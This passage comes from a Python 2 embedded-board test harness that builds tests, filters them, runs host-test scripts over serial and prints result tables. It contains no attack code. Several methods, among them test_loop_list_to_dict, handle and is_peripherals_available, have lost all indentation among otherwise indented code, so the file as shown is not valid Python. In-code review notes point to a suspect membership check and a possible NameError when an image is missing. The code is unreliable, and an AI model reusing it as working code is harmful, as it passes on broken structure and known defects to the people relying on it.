                if self.opts_only_build_tests:
                    # With this option we are skipping testing phase
                    continue
                # Test duration can be increased by global value
                test_duration = test.duration
                if self.opts_extend_test_timeout is not None:
                    test_duration += self.opts_extend_test_timeout
                # For an automated test the duration act as a timeout after
                # which the test gets interrupted
                test_spec = self.shape_test_request(target, path, test_id, test_duration)
                test_loops = self.get_test_loop_count(test_id)
                test_suite_properties['test.duration.%s.%s.%s'% (target, toolchain, test_id)] = test_duration
                test_suite_properties['test.loops.%s.%s.%s'% (target, toolchain, test_id)] = test_loops
                test_suite_properties['test.path.%s.%s.%s'% (target, toolchain, test_id)] = path
                # read MUTs, test specification and perform tests
                handle_results = self.handle(test_spec, target, toolchain, test_loops=test_loops)
                if handle_results is None:
                    continue
                for handle_result in handle_results:
                    if handle_result:
                        single_test_result, detailed_test_results = handle_result
                    else:
                        continue
                    # Append test results to global test summary
                    if single_test_result is not None:
                        self.test_summary.append(single_test_result)
                    # Add detailed test result to test summary structure
                    # NOTE(review): 'if target not in ...[target][toolchain]' looks
                    # like it should test test_id membership — confirm upstream intent.
                    if target not in self.test_summary_ext[target][toolchain]:
                        if test_id not in self.test_summary_ext[target][toolchain]:
                            self.test_summary_ext[target][toolchain][test_id] = []
                        append_test_result = detailed_test_results
                        # If waterfall and consolidate-waterfall options are enabled,
                        # only include the last test result in the report.
                        if self.opts_waterfall_test and self.opts_consolidate_waterfall_test:
                            append_test_result = {0: detailed_test_results[len(detailed_test_results) - 1]}
                        self.test_summary_ext[target][toolchain][test_id].append(append_test_result)
            test_suite_properties['skipped'] = ', '.join(test_suite_properties['skipped'])
            self.test_suite_properties_ext[target][toolchain] = test_suite_properties
        q.put(target + '_'.join(toolchains))
        return
    def execute(self):
        """Run the whole suite, serially or with one thread per target.

        Returns (test_summary, shuffle_random_seed, test_summary_ext,
        test_suite_properties_ext, build_report, build_properties).
        """
        clean = self.test_spec.get('clean', False)
        test_ids = self.test_spec.get('test_ids', [])
        q = Queue()
        # Generate seed for shuffle if seed is not provided in
        self.shuffle_random_seed = round(random.random(), self.SHUFFLE_SEED_ROUND)
        if self.opts_shuffle_test_seed is not None and self.is_shuffle_seed_float():
            self.shuffle_random_seed = round(float(self.opts_shuffle_test_seed), self.SHUFFLE_SEED_ROUND)
        if self.opts_parallel_test_exec:
            ###################################################################
            # Experimental, parallel test execution per singletest instance.
            ###################################################################
            execute_threads = []  # Threads used to build mbed SDL, libs, test cases and execute tests
            # Note: We are building here in parallel for each target separately!
            # So we are not building the same thing multiple times and compilers
            # in separate threads do not collide.
            # Inside execute_thread_slice() function function handle() will be called to
            # get information about available MUTs (per target).
            for target, toolchains in self.test_spec['targets'].iteritems():
                self.test_suite_properties_ext[target] = {}
                t = threading.Thread(target=self.execute_thread_slice, args = (q, target, toolchains, clean, test_ids, self.build_report, self.build_properties))
                t.daemon = True
                t.start()
                execute_threads.append(t)
            for t in execute_threads:
                q.get()  # t.join() would block some threads because we should not wait in any order for thread end
        else:
            # Serialized (not parallel) test execution
            for target, toolchains in self.test_spec['targets'].iteritems():
                if target not in self.test_suite_properties_ext:
                    self.test_suite_properties_ext[target] = {}
                self.execute_thread_slice(q, target, toolchains, clean, test_ids, self.build_report, self.build_properties)
                q.get()
        if self.db_logger:
            self.db_logger.reconnect();
            if self.db_logger.is_connected():
                # Mark this build as completed in the external database.
                self.db_logger.update_build_id_info(self.db_logger_build_id, _status_fk=self.db_logger.BUILD_ID_STATUS_COMPLETED)
                self.db_logger.disconnect();
        return self.test_summary, self.shuffle_random_seed, self.test_summary_ext, self.test_suite_properties_ext, self.build_report, self.build_properties
    def get_valid_tests(self, test_map_keys, target, toolchain, test_ids, include_non_automated):
        """Filter TEST_MAP keys down to the tests that should run for this
        target/toolchain given the -n/-p/peripheral/automation options.
        """
        valid_test_map_keys = []
        for test_id in test_map_keys:
            test = TEST_MAP[test_id]
            if self.opts_test_by_names and test_id not in self.opts_test_by_names:
                continue
            if test_ids and test_id not in test_ids:
                continue
            if self.opts_test_only_peripheral and not test.peripherals:
                if self.opts_verbose_skipped_tests:
                    print self.logger.log_line(self.logger.LogType.INFO, 'Common test skipped for target %s'% (target))
                continue
            if self.opts_peripheral_by_names and test.peripherals and not len([i for i in test.peripherals if i in self.opts_peripheral_by_names]):
                # We will skip tests not forced with -p option
                if self.opts_verbose_skipped_tests:
                    print self.logger.log_line(self.logger.LogType.INFO, 'Common test skipped for target %s'% (target))
                continue
            if self.opts_test_only_common and test.peripherals:
                if self.opts_verbose_skipped_tests:
                    print self.logger.log_line(self.logger.LogType.INFO, 'Peripheral test skipped for target %s'% (target))
                continue
            if not include_non_automated and not test.automated:
                if self.opts_verbose_skipped_tests:
                    print self.logger.log_line(self.logger.LogType.INFO, 'Non automated test skipped for target %s'% (target))
                continue
            if test.is_supported(target, toolchain):
                if test.peripherals is None and self.opts_only_build_tests:
                    # When users are using 'build only flag' and test do not have
                    # specified peripherals we can allow test building by default
                    pass
                elif self.opts_peripheral_by_names and test_id not in self.opts_peripheral_by_names:
                    # If we force peripheral with option -p we expect test
                    # to pass even if peripheral is not in MUTs file.
                    pass
                elif not self.is_peripherals_available(target, test.peripherals):
                    if self.opts_verbose_skipped_tests:
                        if test.peripherals:
                            print self.logger.log_line(self.logger.LogType.INFO, 'Peripheral %s test skipped for target %s'% (",".join(test.peripherals), target))
                        else:
                            print self.logger.log_line(self.logger.LogType.INFO, 'Test %s skipped for target %s'% (test_id, target))
                    continue
                # The test has made it through all the filters, so add it to the valid tests list
                valid_test_map_keys.append(test_id)
        return valid_test_map_keys
def get_skipped_tests(self, all_test_map_keys, valid_test_map_keys):
# NOTE: This will not preserve order
return list(set(all_test_map_keys) - set(valid_test_map_keys))
    def generate_test_summary_by_target(self, test_summary, shuffle_seed=None):
        """ Prints well-formed summary with results (SQL table like)
            table shows text x toolchain test result matrix
        """
        # Column indexes into each test_summary row tuple.
        RESULT_INDEX = 0
        TARGET_INDEX = 1
        TOOLCHAIN_INDEX = 2
        TEST_INDEX = 3
        DESC_INDEX = 4
        unique_targets = get_unique_value_from_summary(test_summary, TARGET_INDEX)
        unique_tests = get_unique_value_from_summary(test_summary, TEST_INDEX)
        unique_test_desc = get_unique_value_from_summary_ext(test_summary, TEST_INDEX, DESC_INDEX)
        unique_toolchains = get_unique_value_from_summary(test_summary, TOOLCHAIN_INDEX)
        result = "Test summary:\n"
        for target in unique_targets:
            result_dict = {}  # test : { toolchain : result }
            unique_target_toolchains = []
            for test in test_summary:
                if test[TARGET_INDEX] == target:
                    if test[TOOLCHAIN_INDEX] not in unique_target_toolchains:
                        unique_target_toolchains.append(test[TOOLCHAIN_INDEX])
                    if test[TEST_INDEX] not in result_dict:
                        result_dict[test[TEST_INDEX]] = {}
                    result_dict[test[TEST_INDEX]][test[TOOLCHAIN_INDEX]] = test[RESULT_INDEX]
            pt_cols = ["Target", "Test ID", "Test Description"] + unique_target_toolchains
            pt = PrettyTable(pt_cols)
            for col in pt_cols:
                pt.align[col] = "l"
            pt.padding_width = 1  # One space between column edges and contents (default)
            for test in unique_tests:
                if test in result_dict:
                    test_results = result_dict[test]
                    if test in unique_test_desc:
                        row = [target, test, unique_test_desc[test]]
                        for toolchain in unique_toolchains:
                            if toolchain in test_results:
                                row.append(test_results[toolchain])
                        pt.add_row(row)
            result += pt.get_string()
            shuffle_seed_text = "Shuffle Seed: %.*f"% (self.SHUFFLE_SEED_ROUND,
                                                      shuffle_seed if shuffle_seed else self.shuffle_random_seed)
            result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
        return result
    def generate_test_summary(self, test_summary, shuffle_seed=None):
        """ Prints well-formed summary with results (SQL table like)
            table shows target x test results matrix across
        """
        # NOTE(review): success_code is assigned but never used — presumably a
        # leftover; confirm before removing.
        success_code = 0  # Success code that can be leter returned to
        result = "Test summary:\n"
        # Pretty table package is used to print results
        pt = PrettyTable(["Result", "Target", "Toolchain", "Test ID", "Test Description",
                          "Elapsed Time (sec)", "Timeout (sec)", "Loops"])
        pt.align["Result"] = "l"  # Left align
        pt.align["Target"] = "l"  # Left align
        pt.align["Toolchain"] = "l"  # Left align
        pt.align["Test ID"] = "l"  # Left align
        pt.align["Test Description"] = "l"  # Left align
        pt.padding_width = 1  # One space between column edges and contents (default)
        # Per-result-code counters for the trailing "Result:" line.
        result_dict = {self.TEST_RESULT_OK : 0,
                       self.TEST_RESULT_FAIL : 0,
                       self.TEST_RESULT_ERROR : 0,
                       self.TEST_RESULT_UNDEF : 0,
                       self.TEST_RESULT_IOERR_COPY : 0,
                       self.TEST_RESULT_IOERR_DISK : 0,
                       self.TEST_RESULT_IOERR_SERIAL : 0,
                       self.TEST_RESULT_NO_IMAGE : 0,
                       self.TEST_RESULT_TIMEOUT : 0,
                       self.TEST_RESULT_MBED_ASSERT : 0,
                       self.TEST_RESULT_BUILD_FAILED : 0,
                       self.TEST_RESULT_NOT_SUPPORTED : 0
        }
        for test in test_summary:
            if test[0] in result_dict:
                result_dict[test[0]] += 1
            pt.add_row(test)
        result += pt.get_string()
        result += "\n"
        # Print result count
        result += "Result: " + ' / '.join(['%s %s' % (value, key) for (key, value) in {k: v for k, v in result_dict.items() if v != 0}.iteritems()])
        shuffle_seed_text = "Shuffle Seed: %.*f\n"% (self.SHUFFLE_SEED_ROUND,
                                                     shuffle_seed if shuffle_seed else self.shuffle_random_seed)
        result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
        return result
def test_loop_list_to_dict(self, test_loops_str):
""" Transforms test_id=X,test_id=X,test_id=X into dictionary {test_id : test_id_loops_count}
"""
result = {}
if test_loops_str:
test_loops = test_loops_str
for test_loop in test_loops:
test_loop_count = test_loop.split('=')
if len(test_loop_count) == 2:
_test_id, _test_loops = test_loop_count
try:
_test_loops = int(_test_loops)
except:
continue
result[_test_id] = _test_loops
return result
def get_test_loop_count(self, test_id):
""" This function returns no. of loops per test (deducted by test_id_.
If test is not in list of redefined loop counts it will use default value.
"""
result = self.GLOBAL_LOOPS_COUNT
if test_id in self.TEST_LOOPS_DICT:
result = self.TEST_LOOPS_DICT[test_id]
return result
def delete_file(self, file_path):
""" Remove file from the system
"""
result = True
resutl_msg = ""
try:
os.remove(file_path)
except Exception, e:
resutl_msg = e
result = False
return result, resutl_msg
    def handle_mut(self, mut, data, target_name, toolchain_name, test_loops=1):
        """ Run one test (possibly looped) on the given MUT (Mbed Under Test).

        @param mut MUT description dict (mcu/disk/port/...), or None
        @param data decoded test spec dict with 'test_id', 'image', 'mcu'
               and optional 'duration'
        @param target_name build target name
        @param toolchain_name toolchain used to build the image
        @param test_loops how many times to repeat the test
        @return (summary_row_tuple, detailed_test_results) or None when no
                MUT / disk / port can be resolved
        """
        # Get test information, image and test timeout
        test_id = data['test_id']
        test = TEST_MAP[test_id]
        test_description = TEST_MAP[test_id].get_description()
        image = data["image"]
        duration = data.get("duration", 10)

        if mut is None:
            print "Error: No Mbed available: MUT[%s]" % data['mcu']
            return None

        mcu = mut['mcu']
        copy_method = mut.get('copy_method') # Available board configuration selection e.g. core selection etc.

        if self.db_logger:
            self.db_logger.reconnect()

        # Per-MUT copy method overrides the command-line option
        selected_copy_method = self.opts_copy_method if copy_method is None else copy_method

        # Tests can be looped so test results must be stored for the same test
        test_all_result = []
        # Test results for one test ran few times
        detailed_test_results = {}  # { Loop_number: { results ... } }

        for test_index in range(test_loops):
            # If mbedls is available and we are auto detecting MUT info,
            # update MUT info (mounting may changed)
            if get_module_avail('mbed_lstools') and self.opts_auto_detect:
                platform_name_filter = [mcu]
                muts_list = {}
                found = False
                # Poll up to 60 times (3 s apart) for the board to re-enumerate
                for i in range(0, 60):
                    print('Looking for %s with MBEDLS' % mcu)
                    muts_list = get_autodetected_MUTS_list(platform_name_filter=platform_name_filter)
                    if 1 not in muts_list:
                        sleep(3)
                    else:
                        found = True
                        break
                if not found:
                    print "Error: mbed not found with MBEDLS: %s" % data['mcu']
                    return None
                else:
                    mut = muts_list[1]

            disk = mut.get('disk')
            port = mut.get('port')

            if disk is None or port is None:
                return None

            target_by_mcu = TARGET_MAP[mut['mcu']]
            target_name_unique = mut['mcu_unique'] if 'mcu_unique' in mut else mut['mcu']
            # Some extra stuff can be declared in MUTs structure
            reset_type = mut.get('reset_type') # reboot.txt, reset.txt, shutdown.txt
            reset_tout = mut.get('reset_tout') # COPY_IMAGE -> RESET_PROC -> SLEEP(RESET_TOUT)

            # When the build and test system were separate, this was relative to a
            # base network folder base path: join(NETWORK_BASE_PATH, )
            image_path = image

            # Host test execution
            start_host_exec_time = time()

            single_test_result = self.TEST_RESULT_UNDEF # single test run result
            _copy_method = selected_copy_method
            if not exists(image_path):
                single_test_result = self.TEST_RESULT_NO_IMAGE
                elapsed_time = 0
                single_test_output = self.logger.log_line(self.logger.LogType.ERROR, 'Image file does not exist: %s'% image_path)
                print single_test_output
            else:
                # Host test execution
                start_host_exec_time = time()

                host_test_verbose = self.opts_verbose_test_result_only or self.opts_verbose
                host_test_reset = self.opts_mut_reset_type if reset_type is None else reset_type
                host_test_result = self.run_host_test(test.host_test,
                                                      image_path, disk, port, duration,
                                                      micro=target_name,
                                                      verbose=host_test_verbose,
                                                      reset=host_test_reset,
                                                      reset_tout=reset_tout,
                                                      copy_method=selected_copy_method,
                                                      program_cycle_s=target_by_mcu.program_cycle_s)
                single_test_result, single_test_output, single_testduration, single_timeout = host_test_result

            # Store test result
            test_all_result.append(single_test_result)
            total_elapsed_time = time() - start_host_exec_time # Test time with copy (flashing) / reset
            # NOTE(review): when the image file is missing, single_testduration and
            # single_timeout were never assigned in this iteration, so the lines
            # below would raise NameError on the first loop - confirm that path.
            elapsed_time = single_testduration # Time of single test case execution after reset

            detailed_test_results[test_index] = {
                'result' : single_test_result,
                'output' : single_test_output,
                'target_name' : target_name,
                'target_name_unique' : target_name_unique,
                'toolchain_name' : toolchain_name,
                'id' : test_id,
                'description' : test_description,
                'elapsed_time' : round(elapsed_time, 2),
                'duration' : single_timeout,
                'copy_method' : _copy_method,
            }

            print self.print_test_result(single_test_result, target_name_unique, toolchain_name,
                                         test_id, test_description, elapsed_time, single_timeout)

            # Update database entries for ongoing test
            if self.db_logger and self.db_logger.is_connected():
                test_type = 'SingleTest'
                self.db_logger.insert_test_entry(self.db_logger_build_id,
                                                 target_name,
                                                 toolchain_name,
                                                 test_type,
                                                 test_id,
                                                 single_test_result,
                                                 single_test_output,
                                                 elapsed_time,
                                                 single_timeout,
                                                 test_index)

            # If we perform waterfall test we test until we get OK and we stop testing
            if self.opts_waterfall_test and single_test_result == self.TEST_RESULT_OK:
                break

        if self.db_logger:
            self.db_logger.disconnect()

        return (self.shape_global_test_loop_result(test_all_result, self.opts_waterfall_test and self.opts_consolidate_waterfall_test),
                target_name_unique,
                toolchain_name,
                test_id,
                test_description,
                round(elapsed_time, 2),
                single_timeout,
                self.shape_test_loop_ok_result_count(test_all_result)), detailed_test_results
def handle(self, test_spec, target_name, toolchain_name, test_loops=1):
""" Function determines MUT's mbed disk/port and copies binary to
target.
"""
handle_results = []
data = json.loads(test_spec)
# Find a suitable MUT:
mut = None
for id, m in self.muts.iteritems():
if m['mcu'] == data['mcu']:
mut = m
handle_result = self.handle_mut(mut, data, target_name, toolchain_name, test_loops=test_loops)
handle_results.append(handle_result)
return handle_results
def print_test_result(self, test_result, target_name, toolchain_name,
test_id, test_description, elapsed_time, duration):
""" Use specific convention to print test result and related data
"""
tokens = []
tokens.append("TargetTest")
tokens.append(target_name)
tokens.append(toolchain_name)
tokens.append(test_id)
tokens.append(test_description)
separator = "::"
time_info = " in %.2f of %d sec" % (round(elapsed_time, 2), duration)
result = separator.join(tokens) + " [" + test_result +"]" + time_info
return Fore.MAGENTA + result + Fore.RESET
def shape_test_loop_ok_result_count(self, test_all_result):
""" Reformats list of results to simple string
"""
test_loop_count = len(test_all_result)
test_loop_ok_result = test_all_result.count(self.TEST_RESULT_OK)
return "%d/%d"% (test_loop_ok_result, test_loop_count)
def shape_global_test_loop_result(self, test_all_result, waterfall_and_consolidate):
""" Reformats list of results to simple string
"""
result = self.TEST_RESULT_FAIL
if all(test_all_result[0] == res for res in test_all_result):
result = test_all_result[0]
elif waterfall_and_consolidate and any(res == self.TEST_RESULT_OK for res in test_all_result):
result = self.TEST_RESULT_OK
return result
    def run_host_test(self, name, image_path, disk, port, duration,
                      micro=None, reset=None, reset_tout=None,
                      verbose=False, copy_method=None, program_cycle_s=None):
        """ Spawn the host-test script as a subprocess and pump its serial
            output until the test ends or a 2*duration timeout elapses.

        @param name host test script name (run as '<name>.py' from HOST_TESTS)
        @param image_path binary to flash; disk/port: MUT mount point / serial port
        @param duration test timeout in seconds (may be overridden by the MUT
               via an auto-detected 'timeout' property)
        @return tuple (result_code, captured_output, testcase_duration, duration)
        """

        def get_char_from_queue(obs):
            """ Get one character from the observer queue; None on 0.5 s timeout.
            """
            try:
                c = obs.queue.get(block=True, timeout=0.5)
            except Empty, _:
                c = None
            return c

        def filter_queue_char(c):
            """ Replace non-ASCII serial bytes with a space.
            """
            if ord(c) not in range(128):
                c = ' '
            return c

        def get_test_result(output):
            """ Scan captured output for a result token; TIMEOUT when none found.
            """
            result = self.TEST_RESULT_TIMEOUT
            for line in "".join(output).splitlines():
                search_result = self.RE_DETECT_TESTCASE_RESULT.search(line)
                if search_result and len(search_result.groups()):
                    result = self.TEST_RESULT_MAPPING[search_result.groups(0)[0]]
                    break
            return result

        def get_auto_property_value(property_name, line):
            """ Extract the value of "HOST: Property '<name>' = '<value>'" from
                a line, or return None when absent.
            """
            result = None
            if re.search("HOST: Property '%s'"% property_name, line) is not None:
                property = re.search("HOST: Property '%s' = '([\w\d _]+)'"% property_name, line)
                if property is not None and len(property.groups()) == 1:
                    result = property.groups()[0]
            return result

        # print "{%s} port:%s disk:%s" % (name, port, disk),
        # Build the host-test command line
        cmd = ["python",
               '%s.py'% name,
               '-d', disk,
               '-f', '"%s"'% image_path,
               '-p', port,
               '-t', str(duration),
               '-C', str(program_cycle_s)]

        if get_module_avail('mbed_lstools') and self.opts_auto_detect:
            cmd += ['--auto']

        # Add extra parameters to host_test
        if copy_method is not None:
            cmd += ["-c", copy_method]
        if micro is not None:
            cmd += ["-m", micro]
        if reset is not None:
            cmd += ["-r", reset]
        if reset_tout is not None:
            cmd += ["-R", str(reset_tout)]

        if verbose:
            print Fore.MAGENTA + "Executing '" + " ".join(cmd) + "'" + Fore.RESET
            print "Test::Output::Start"

        proc = Popen(cmd, stdout=PIPE, cwd=HOST_TESTS)
        obs = ProcessObserver(proc)
        update_once_flag = {}   # Stores flags checking if some auto-parameter was already set
        line = ''
        output = []
        start_time = time()
        # Pump characters until the test signals {end} / asserts, or we hit 2x timeout
        while (time() - start_time) < (2 * duration):
            c = get_char_from_queue(obs)
            if c:
                if verbose:
                    sys.stdout.write(c)
                c = filter_queue_char(c)
                output.append(c)
                # Give the mbed under test a way to communicate the end of the test
                if c in ['\n', '\r']:
                    # Checking for auto-detection information from the test about MUT reset moment
                    if 'reset_target' not in update_once_flag and "HOST: Reset target..." in line:
                        # We will update this marker only once to prevent multiple time resets
                        update_once_flag['reset_target'] = True
                        start_time = time()

                    # Checking for auto-detection information from the test about timeout
                    auto_timeout_val = get_auto_property_value('timeout', line)
                    if 'timeout' not in update_once_flag and auto_timeout_val is not None:
                        # We will update this marker only once to prevent multiple time resets
                        update_once_flag['timeout'] = True
                        duration = int(auto_timeout_val)

                    # Detect mbed assert:
                    if 'mbed assertation failed: ' in line:
                        output.append('{{mbed_assert}}')
                        break

                    # Check for test end
                    if '{end}' in line:
                        break
                    line = ''
                else:
                    line += c
        end_time = time()
        testcase_duration = end_time - start_time   # Test case duration from reset to {end}

        # Drain one last pending character, if any
        c = get_char_from_queue(obs)

        if c:
            if verbose:
                sys.stdout.write(c)
            c = filter_queue_char(c)
            output.append(c)

        if verbose:
            print "Test::Output::Finish"
        # Stop test process
        obs.stop()

        result = get_test_result(output)
        return (result, "".join(output), testcase_duration, duration)
def is_peripherals_available(self, target_mcu_name, peripherals=None):
""" Checks if specified target should run specific peripheral test case defined in MUTs file
"""
if peripherals is not None:
peripherals = set(peripherals)
for id, mut in self.muts.iteritems():
# Target MCU name check
if mut["mcu"] != target_mcu_name:
continue
# Peripherals check
if peripherals is not None:
if 'peripherals' not in mut:
continue
if not peripherals.issubset(set(mut['peripherals'])):
continue
return True
return False
def shape_test_request(self, mcu, image_path, test_id, duration=10):
""" Function prepares JSON structure describing test specification
"""
test_spec = {
"mcu": mcu,
"image": image_path,
"duration": duration,
"test_id": test_id,
}
return json.dumps(test_spec)
def get_unique_value_from_summary(test_summary, index):
    """ Return the sorted list of unique values found at position 'index'
        of each test summary row.
    """
    seen = []
    for row in test_summary:
        if row[index] not in seen:
            seen.append(row[index])
    return sorted(seen)
def get_unique_value_from_summary_ext(test_summary, index_key, index_val):
    """ Build a dictionary mapping each unique value at 'index_key' to the
        value at 'index_val' of the FIRST row where that key appeared.
    """
    mapping = {}
    for row in test_summary:
        key = row[index_key]
        if key not in mapping:
            mapping[key] = row[index_val]
    return mapping
def show_json_file_format_error(json_spec_filename, line, column):
    """ Print the broken JSON context: the few lines before the defect and a
        caret ('^') marker under the offending column.

    @param json_spec_filename path of the JSON file to display
    @param line 1-based line number of the defect
    @param column 1-based column number of the defect
    """
    with open(json_spec_filename) as data_file:
        line_no = 1
        for json_line in data_file:
            if line_no + 5 >= line: # Print last few lines before error
                print 'Line %d:\t'%line_no + json_line, # Prints line
            if line_no == line:
                # Caret line aligned under the defect column
                print ' ' * len('Line %d:'%line_no) + '\t', '-' * (column-1) + '^'
                break
            line_no += 1
def json_format_error_defect_pos(json_error_msg):
    """ Parse '[line, column]' of the first defect out of a json.loads()
        exception message ('... line N column M ...').

    @return [line, column] when both positions were found, otherwise None
    """
    defect = None
    line_no, col_no = 0, 0
    # Locate the 'line N' fragment first; the column is only meaningful
    # when the line was found (matches the original nesting)
    line_match = re.search('line [0-9]+', json_error_msg)
    if line_match is not None:
        tokens = line_match.group().split(' ')
        if len(tokens) == 2:
            line_no = int(tokens[1])
            col_match = re.search('column [0-9]+', json_error_msg)
            if col_match is not None:
                tokens = col_match.group().split(' ')
                if len(tokens) == 2:
                    col_no = int(tokens[1])
                    defect = [line_no, col_no]
    return defect
def get_json_data_from_file(json_spec_filename, verbose=False):
    """ Load and parse a JSON file into a Python data structure.

    @param json_spec_filename path of the JSON file
    @param verbose when True, pretty-print the parsed result
    @return parsed data, or None when the file could not be opened or parsed
            (diagnostics are printed, including the defect position when it
            can be extracted from the parser's error message)
    """
    result = None
    try:
        with open(json_spec_filename) as data_file:
            try:
                result = json.load(data_file)
            except ValueError as json_error_msg:
                result = None
                print 'JSON file %s parsing failed. Reason: %s' % (json_spec_filename, json_error_msg)
                # We can print where error occurred inside JSON file if we can parse exception msg
                json_format_defect_pos = json_format_error_defect_pos(str(json_error_msg))
                if json_format_defect_pos is not None:
                    line = json_format_defect_pos[0]
                    column = json_format_defect_pos[1]
                    print
                    show_json_file_format_error(json_spec_filename, line, column)

    except IOError as fileopen_error_msg:
        print 'JSON file %s not opened. Reason: %s'% (json_spec_filename, fileopen_error_msg)
        print
    if verbose and result:
        pp = pprint.PrettyPrinter(indent=4)
        pp.pprint(result)
    return result
def print_muts_configuration_from_json(json_data, join_delim=", ", platform_filter=None):
    """ Render the MUTs configuration as a table string (for verbose output).

    @param json_data dict of {mut_index: {property: value, ...}}
    @param join_delim delimiter used to flatten list-valued properties
    @param platform_filter optional regex applied to each MUT's 'mcu' field
    @return pretty-printed table as a string
    """
    # Column set = union of every property used by any MUT
    property_cols = []
    for mut_id in json_data:
        for prop in json_data[mut_id]:
            if prop not in property_cols:
                property_cols.append(prop)

    columns = ["index"] + property_cols
    pt = PrettyTable(columns)
    for col in columns:
        pt.align[col] = "l"

    # One row per MUT, honoring the optional platform regex filter
    for mut_id in json_data:
        info = json_data[mut_id]
        include = True
        if platform_filter and 'mcu' in info:
            include = re.search(platform_filter, info['mcu']) is not None
        if not include:
            continue
        row = [mut_id]
        for prop in property_cols:
            value = info[prop] if prop in info else None
            if type(value) == ListType:
                value = join_delim.join(value)
            row.append(value)
        pt.add_row(row)
    return pt.get_string()
def print_test_configuration_from_json(json_data, join_delim=", "):
    """ Render the test specification (targets x toolchains) as a table string,
        marking conflicts: '*' = toolchain not supported by the target,
        '#' = toolchain path not found on disk.

    @param json_data test spec dict shaped like {'targets': {target: [toolchains]}}
    @param join_delim delimiter used when listing conflicted toolchains
    @return table string followed by a human-readable conflict report
    """
    toolchains_info_cols = []
    # We need to check all toolchains for each device
    for k in json_data:
        # k should be 'targets'
        targets = json_data[k]
        for target in targets:
            toolchains = targets[target]
            for toolchain in toolchains:
                if toolchain not in toolchains_info_cols:
                    toolchains_info_cols.append(toolchain)

    # Prepare pretty table object to display test specification
    pt_cols = ["mcu"] + sorted(toolchains_info_cols)
    pt = PrettyTable(pt_cols)
    for col in pt_cols:
        pt.align[col] = "l"

    # { target : [conflicted toolchains] }
    toolchain_conflicts = {}
    toolchain_path_conflicts = []
    for k in json_data:
        # k should be 'targets'
        targets = json_data[k]
        for target in targets:
            target_supported_toolchains = get_target_supported_toolchains(target)
            if not target_supported_toolchains:
                target_supported_toolchains = []
            # Unknown targets are marked with a trailing '*' in the mcu column
            target_name = target if target in TARGET_MAP else "%s*"% target
            row = [target_name]
            toolchains = targets[target]

            for toolchain in sorted(toolchains_info_cols):
                # Check for conflicts: target vs toolchain
                conflict = False
                conflict_path = False
                if toolchain in toolchains:
                    if toolchain not in target_supported_toolchains:
                        conflict = True
                        if target not in toolchain_conflicts:
                            toolchain_conflicts[target] = []
                        toolchain_conflicts[target].append(toolchain)
                # Add marker inside table about target usage / conflict
                cell_val = 'Yes' if toolchain in toolchains else '-'
                if conflict:
                    cell_val += '*'
                # Check for conflicts: toolchain vs toolchain path
                if toolchain in TOOLCHAIN_PATHS:
                    toolchain_path = TOOLCHAIN_PATHS[toolchain]
                    if not os.path.isdir(toolchain_path):
                        conflict_path = True
                        if toolchain not in toolchain_path_conflicts:
                            toolchain_path_conflicts.append(toolchain)
                if conflict_path:
                    cell_val += '#'
                row.append(cell_val)
            pt.add_row(row)

    # generate result string
    result = pt.get_string()    # Test specification table
    if toolchain_conflicts or toolchain_path_conflicts:
        result += "\n"
        result += "Toolchain conflicts:\n"
        for target in toolchain_conflicts:
            if target not in TARGET_MAP:
                result += "\t* Target %s unknown\n"% (target)
            conflict_target_list = join_delim.join(toolchain_conflicts[target])
            sufix = 's' if len(toolchain_conflicts[target]) > 1 else ''
            result += "\t* Target %s does not support %s toolchain%s\n"% (target, conflict_target_list, sufix)

        for toolchain in toolchain_path_conflicts:
            # Let's check toolchain configuration
            if toolchain in TOOLCHAIN_PATHS:
                toolchain_path = TOOLCHAIN_PATHS[toolchain]
                if not os.path.isdir(toolchain_path):
                    result += "\t# Toolchain %s path not found: %s\n"% (toolchain, toolchain_path)
    return result
def get_avail_tests_summary_table(cols=None, result_summary=True, join_delim=',',platform_filter=None):
    """ Generate a table of all test cases plus (optionally) automation
        coverage statistics, for display to the test suite user.

    @param cols list of test properties to show as columns (default set below)
    @param result_summary when True (and no platform filter), append overall
           and per-prefix automation coverage tables
    @param join_delim delimiter used to flatten list-valued test properties
    @param platform_filter regex applied to test ids to narrow the listing
    @return the formatted table(s) as one string
    """
    # get all unique test ID prefixes (e.g. 'MBED' from 'MBED_1')
    unique_test_id = []
    for test in TESTS:
        split = test['id'].split('_')[:-1]
        test_id_prefix = '_'.join(split)
        if test_id_prefix not in unique_test_id:
            unique_test_id.append(test_id_prefix)
    unique_test_id.sort()
    # Per-prefix counters: automated tests vs all tests
    counter_dict_test_id_types = dict((t, 0) for t in unique_test_id)
    counter_dict_test_id_types_all = dict((t, 0) for t in unique_test_id)

    test_properties = ['id',
                       'automated',
                       'description',
                       'peripherals',
                       'host_test',
                       'duration'] if cols is None else cols

    # All tests status table print
    pt = PrettyTable(test_properties)
    for col in test_properties:
        pt.align[col] = "l"
    pt.align['duration'] = "r"

    counter_all = 0
    counter_automated = 0
    pt.padding_width = 1    # One space between column edges and contents (default)

    for test_id in sorted(TEST_MAP.keys()):
        if platform_filter is not None:
            # Filter out tests using regex on the test id
            if re.search(platform_filter, test_id) is None:
                continue

        row = []
        test = TEST_MAP[test_id]
        split = test_id.split('_')[:-1]
        test_id_prefix = '_'.join(split)

        for col in test_properties:
            col_value = test[col]
            if type(test[col]) == ListType:
                col_value = join_delim.join(test[col])
            elif test[col] == None:
                col_value = "-"
            row.append(col_value)
        if test['automated'] == True:
            counter_dict_test_id_types[test_id_prefix] += 1
            counter_automated += 1
        pt.add_row(row)
        # Update counters
        counter_all += 1
        counter_dict_test_id_types_all[test_id_prefix] += 1
    result = pt.get_string()
    result += "\n\n"

    if result_summary and not platform_filter:
        # Automation result summary
        test_id_cols = ['automated', 'all', 'percent [%]', 'progress']
        pt = PrettyTable(test_id_cols)
        pt.align['automated'] = "r"
        pt.align['all'] = "r"
        pt.align['percent [%]'] = "r"

        percent_progress = round(100.0 * counter_automated / float(counter_all), 1)
        str_progress = progress_bar(percent_progress, 75)
        pt.add_row([counter_automated, counter_all, percent_progress, str_progress])
        result += "Automation coverage:\n"
        result += pt.get_string()
        result += "\n\n"

        # Test automation coverage table print
        test_id_cols = ['id', 'automated', 'all', 'percent [%]', 'progress']
        pt = PrettyTable(test_id_cols)
        pt.align['id'] = "l"
        pt.align['automated'] = "r"
        pt.align['all'] = "r"
        pt.align['percent [%]'] = "r"
        for unique_id in unique_test_id:
            # print "\t\t%s: %d / %d" % (unique_id, counter_dict_test_id_types[unique_id], counter_dict_test_id_types_all[unique_id])
